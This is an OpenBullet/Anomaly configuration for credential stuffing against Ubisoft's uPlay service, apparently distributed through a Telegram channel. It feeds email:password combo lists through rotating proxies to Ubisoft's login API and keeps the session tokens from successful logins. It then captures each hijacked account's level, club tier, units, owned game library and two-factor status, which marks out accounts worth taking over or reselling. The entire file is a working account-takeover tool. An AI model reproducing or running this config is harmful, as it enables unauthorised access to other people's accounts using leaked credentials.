[SETTINGS]
{
  "Name": "uPlay By TG- @PremiumHostTG",
  "SuggestedBots": 180,
  "MaxCPM": 0,
  "LastModified": "2021-03-27T14:14:34.2686981+00:00",
  "AdditionalInfo": "uPlay By TG- @PremiumHostTG",
  "Author": "uPlay By TG- @PremiumHostTG",
  "Version": "1.4.2HF [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#1 FUNCTION Base64Encode "<USER>:<PASS>" -> VAR "1" 

#login REQUEST POST "https://public-ubiservices.ubi.com/v3/profiles/sessions" 
  CONTENT "{\"rememberMe\":true}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Basic <1>" 
  HEADER "GenomeId: 4f9d4adf-3646-4058-8553-c7b48df556e0" 
  HEADER "Ubi-AppId: 39baebad-39e5-4552-8c25-2c9b919064e2" 
  HEADER "Ubi-RequestedPlatformType: uplay" 

#verify_login KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"ticket\":\"" 
  KEYCHAIN Failure OR 
    KEY "Invalid credentials" 

#2 PARSE "<SOURCE>" LR "ticket\":\"" "\",\"" -> VAR "2" 

#3 PARSE "<SOURCE>" LR "userId\":\"" "\",\"" -> VAR "3" 

#profile REQUEST GET "https://public-ubiservices.ubi.com/v1/profiles/club?profileIds=<3>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "authorization: Ubi_v1 t=<2>" 
  HEADER "GenomeId: 4f9d4adf-3646-4058-8553-c7b48df556e0" 
  HEADER "Ubi-AppId: 39baebad-39e5-4552-8c25-2c9b919064e2" 

#Units PARSE "<SOURCE>" LR "units\":" ",\"" -> CAP "Units" 

#Level PARSE "<SOURCE>" LR "levelNumber\":" ",\"" -> CAP "Level" 

#Tier PARSE "<SOURCE>" LR "tierName\":\"" "\",\"" -> CAP "Tier" 

#isClubMember PARSE "<SOURCE>" LR "isClubMember\":" ",\"" -> CAP "isClubMember" 

#library REQUEST GET "https://wspuplay-ext.ubi.com/UplayServices/WinServices/GameClientServices.svc/REST/JSON/GetGamePlatformsByUserId/<3>/en-US/?onlyOwned=true&rowsCount=-1&pCodeIssuer=PC&country=EN" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "authorization: Ubi_v1 t=<2>" 
  HEADER "GenomeId: 4f9d4adf-3646-4058-8553-c7b48df556e0" 
  HEADER "Ubi-AppId: 39baebad-39e5-4552-8c25-2c9b919064e2" 

#Games PARSE "<SOURCE>" LR "\"Name\":\"" "\"" Recursive=TRUE -> CAP "Games" 

#Platforms PARSE "<SOURCE>" LR "PlatformCode\":\"" "\",\"" Recursive=TRUE -> CAP "Platforms" 

#profile REQUEST GET "https://public-ubiservices.ubi.com/v2/profiles/me/2fa" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "authorization: Ubi_v1 t=<2>" 
  HEADER "GenomeId: 4f9d4adf-3646-4058-8553-c7b48df556e0" 
  HEADER "Ubi-AppId: 39baebad-39e5-4552-8c25-2c9b919064e2" 

#2fa_check KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "active\":true" 

#2fa PARSE "<SOURCE>" LR "active\":" ",\"" -> CAP "2fa" 